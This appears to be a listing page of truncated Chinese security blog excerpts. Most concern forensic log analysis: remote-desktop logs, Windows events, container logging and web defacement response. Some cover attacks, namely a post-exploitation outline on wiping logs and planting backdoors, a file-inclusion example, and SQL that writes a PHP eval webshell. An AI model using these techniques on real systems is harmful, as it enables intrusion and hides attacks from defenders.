1.环境部署 1.安装ubuntu_x64的deb安装包 2.打开TeamViewer 2.日志目录 1.通过图形应用找到日志文件 2.通过命令定位日志文件 find / -name "TeamViewer 2>/dev/null" 3.日志文件介绍 1.logfiles目录,对于可以进行图形界面登录的用户,在teamviewer目录下会有该用户的目录文件 2.这里关注Connecttions_incoming.txt文件,可以得到远程主机的teamviewer的id和用户名,登…

1.简介 向日葵工具具有linux桌面系统版本,在应急场景中,攻击者通过向日葵远控linux实现入侵是一种常见手法,通过分析向日葵的服务日志,可以分析出安全事件时间发生点前后有无向日葵远控的行为,但由于向日葵采取中转的第三方连接,而不是像ssh远控一样端到端的连接,所以无法溯源到真实IP. 2.日志路径 1.这里以我的mac系统为例子,通过菜单栏可以查看到log文件,选中view logs即可 2.找到服务日志文件,我这里是sunlogin_service.log 3.也可以通过find命令定位…

windows操作系统事件日志 C:\Windows\System32\winevt\Logs\ *( XP C:\Windows\System32) 应用程序日志 App Event.Evtx(Application.evtx) 安全日志 SecEvent.Evtx 系统日志 SysEvent.Evtx USB设备第一次连接电脑:setupapi.log Windows7/8:\Windows\inf\setupapi.dev.log \ Windows XP:\Windows\setupap…

0x00 概述 应用程序和系统日志可以帮助我们了解集群内部的运行情况,日志对于我们调试问题和监视集群情况也是非常有用的.而且大部分的应用都会有日志记录,对于传统的应用大部分都会写入到本地的日志文件之中.对于容器化应用程序来说则更简单,只需要将日志信息写入到 stdout 和 stderr 即可,容器默认情况下就会把这些日志输出到宿主机上的一个 JSON 文件之中,同样我们也可以通过 docker logs 或者 kubectl logs 来查看到对应的日志信息. 但是,通常来说容器引擎或运行时提…

0x00 配置FIlebeat搜集syslog并发送至 #配置 mv /etc/filebeat/filebeat.yml /etc/filebeat/filebeat.yml.bak vim /etc/filebeat/filebeat.yml filebeat.prospectors: - type: log enabled: true paths: - /var/log/messages fields: log_topics: syslog-1.202 max_bytes: 1048576…

简单的log日志 鉴于任何功能模块或系统在调试时都需要日志打印,这里随便写了一下,作为以后代码调试之用,只实现了不同等级的日志输出功能,其他的调试功能以后再行添加:使用方法简单,只需要在头文件里事先按照log的输出等级定义几个宏即可,然后就可以在源码文件中直接使用了,后面附上使用例程: 源码如下: LogC.h #ifndef __LOG_SYSTEM_H__ #define __LOG_SYSTEM_H__ #include <inttypes.h> /** 错误码基数 **/ #defin…

后渗透测试阶段--上传工具 为防止管理员将漏洞补上后,我们无法再通过该漏洞控制对方主机,所以需要进行后渗透测试阶段 1.上传各种工具 2.提权:为了全面控制目标系统 3.擦除攻击痕迹:防止管理员通过日志溯源追踪,发现攻击源头[除了系统日记,应用程序也会有自己的日志信息] ##删除系统日记和应用程序日记 例如:SLmail中 4.安装后门程序 实现长期控制,Dump密码,作为跳板进行内网渗透[大部分情况下,比公网渗透简单] 注:后渗透利用阶段 最大的挑战:防病毒软件[根据病毒特征库进行查杀].所以…

网站首页被非法篡改,是的,就是你一打开网站就知道自己的网站出现了安全问题,网站程序存在严重的安全漏洞,攻击者通过上传脚本木马,从而对网站内容进行篡改.而这种篡改事件在某些场景下,会被无限放大. 现象描述 网站首页被恶意篡改,比如复制原来的图片,PS一下,然后替换上去. 问题处理 1.确认篡改时间 通过对被篡改的图片进行查看,确认图片篡改时间为2018年04月18日 19:24:07 . 2.访问日志溯源 通过图片修改的时间节点,发现可疑IP:113.xx.xx.24 (代理IP,无法追溯真实来源…

0x00 何为文件包含漏洞 开发人员如果在写类似include "a.php"的代码时,如果将a.php写成了可变的值,那么就可以在上面做文章,举个理想的例子: <? include $_GET['a'] ?> 此时可以把url中传入的合法get值篡改成非法值,include进去,这个非法值就被php解释器执行了. 一个更具体的例子: 在访问一个页面时: 此图表明可以传入文件名来形成文件包含效果,如果在此目录建立a.txt并填充内容,则修改page=a.txt就会显示文件内…

0x01.利用MySQL命令导出getshell 利用条件: 1.拥有网站的写入权限 2.Secure_file_priv参数为空或者为指定路径 3.知道网站的绝对路径 方法: 通过into outfile 进行文件写入,写入一句话木马 CREATE TABLE shell(cmd text); INSERT INTO shell(cmd) VALUES('<?php @eval($_POST[CMD]); ?>'); SELECT cmd from shell INTO OUTFILE 'D…